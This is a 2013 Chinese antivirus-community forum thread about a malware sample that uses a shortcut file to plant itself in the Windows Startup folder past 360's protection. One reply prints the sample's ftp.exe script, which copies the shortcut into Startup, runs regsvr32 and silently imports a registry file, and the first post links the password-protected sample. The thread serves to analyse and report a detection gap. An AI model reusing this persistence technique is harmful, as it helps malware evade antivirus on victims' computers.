关于快捷方式写启动的一个样本

显示全部楼层 · 发表于 2013-8-11 22:34:19

本帖最后由 kfx13 于 2013-8-11 22:45 编辑

某帖提到了快捷方式写启动，我正好有一个。

本身通过快捷方式这个其实不算主防的缺陷，和其他的各种诱骗类似，这个方法是要诱骗你去点击从而达到目的。

不过360对其他的写启动文件夹都有防范，这个样本等于说是钻了个小空子。所以还是发一下

http://yunpan.cn/QnihBNcSXgFz7

压缩包的密码是我qq昵称小写，知道的别说，不然我下次就换密码了。。

显示全部楼层 · 发表于 2013-8-11 23:02:50

连密码都不告诉我们lz发这边有意义呢

显示全部楼层 · 发表于 2013-8-11 23:10:08

大金鱼先生发表于 2013-8-11 23:02
连密码都不告诉我们lz发这边有意义呢

你可以PM我

显示全部楼层 · 发表于 2013-8-11 23:17:59

快捷方式写启动项这按理说360可以拦截的，不拦截的原因可能就是样本判白了？
对了你说的是哪个QQ，我这里有你2个，是哪一个

显示全部楼层 · 发表于 2013-8-11 23:32:23

本帖最后由 vm001 于 2013-8-11 23:35 编辑

判白的缘故
现在可以拦截了

显示全部楼层 · 发表于 2013-8-11 23:45:39

vm001 发表于 2013-8-11 23:32
判白的缘故
现在可以拦截了

闹闹，
运行lnk后写启动项没拦，你看看启动项已经写上了。

显示全部楼层 · 发表于 2013-8-11 23:49:40

本帖最后由 vm001 于 2013-8-12 07:25 编辑

kfx13 发表于 2013-8-11 23:45
闹闹，
运行lnk后写启动项没拦，你看看启动项已经写上了。

嗯，确实没拦截
是利用ftp.exe启动他写到windows下的dll（其实不是dll）
这是他的内容

!copy c:\1.lnk C:\DOCUME~1\ADMINI~1\「开始~1\程序\启动\pps.lnk&cls
!regsvr32 Oleaut32.dll
!regedit.exe /s n.reg
bye

可能是ftp是信任程序的缘故吧，测试了下如果是其他进程写入会拦截，哪怕是explorer写入也会拦截

显示全部楼层 · 发表于 2013-8-11 23:50:57

vm001 发表于 2013-8-11 23:49
嗯，确实没拦截
是利用ftp.exe期待他写到system32下的dll（其实不是dll）
这是他的内容

另外图片里那两个文件应该本身就是白的或者非黑的。同目录下还有个cp

显示全部楼层 · 发表于 2013-8-12 08:58:45

kfx13 发表于 2013-8-11 23:10
你可以PM我

没必要了

显示全部楼层 · 发表于 2013-8-12 09:38:58

没有判白但是依然过主动的也是存在的，这个的确是拦截点问题

[问题反馈] 关于快捷方式写启动的一个样本

评分

本帖子中包含更多资源

RE: 关于快捷方式写启动的一个样本